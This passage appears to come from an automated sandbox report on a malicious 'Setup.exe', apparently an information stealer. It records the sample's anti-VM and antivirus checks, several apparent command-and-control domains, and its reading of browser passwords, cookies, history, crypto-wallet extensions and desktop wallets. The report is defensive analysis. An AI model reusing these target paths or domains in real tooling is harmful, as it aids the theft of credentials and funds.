                  Source: Setup.exe, 00000000.00000003.1888928350.00000000010F9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1602909943.0000000001123000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1888928350.0000000001137000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1764468215.0000000001137000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1703033346.0000000001137000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E5A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                  Source: C:\Users\user\Desktop\Setup.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C002D5 mov edx, dword ptr fs:[00000030h]0_2_02C002D5
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C00895 mov eax, dword ptr fs:[00000030h]0_2_02C00895
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C00EE4 mov eax, dword ptr fs:[00000030h]0_2_02C00EE4
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C00EE5 mov eax, dword ptr fs:[00000030h]0_2_02C00EE5
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C00C45 mov eax, dword ptr fs:[00000030h]0_2_02C00C45

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: Setup.exeString found in binary or memory: crosshuaht.lat
                  Source: Setup.exeString found in binary or memory: rapeflowwj.lat
                  Source: Setup.exeString found in binary or memory: aspecteirs.lat
                  Source: Setup.exeString found in binary or memory: sustainskelet.lat
                  Source: Setup.exeString found in binary or memory: simplerapplau.click
                  Source: Setup.exeString found in binary or memory: necklacebudi.lat
                  Source: Setup.exeString found in binary or memory: energyaffai.lat
                  Source: Setup.exeString found in binary or memory: grannyejh.lat
                  Source: Setup.exeString found in binary or memory: discokeyus.lat
                  Source: C:\Users\user\Desktop\Setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Setup.exe, 00000000.00000003.1827196762.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1892199382.00000000011A7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1888928350.0000000001198000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\Desktop\Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 7128, type: MEMORYSTR
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: Setup.exe, 00000000.00000003.1826294302.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: allets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets",
                  Source: Setup.exe, 00000000.00000003.1826294302.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: allets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets",
                  Source: Setup.exe, 00000000.00000002.1892093250.0000000001190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                  Source: Setup.exe, 00000000.00000003.1764468215.0000000001158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                  Source: Setup.exe, 00000000.00000003.1703033346.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                  Source: Setup.exe, 00000000.00000003.1764468215.0000000001158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                  Source: Setup.exe, 00000000.00000003.1764468215.0000000001158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                  Source: Setup.exe, 00000000.00000002.1892093250.0000000001190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                  Source: Setup.exe, 00000000.00000003.1765557136.000000000118C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                  Source: Setup.exe, 00000000.00000003.1703033346.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger LiveU|I
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
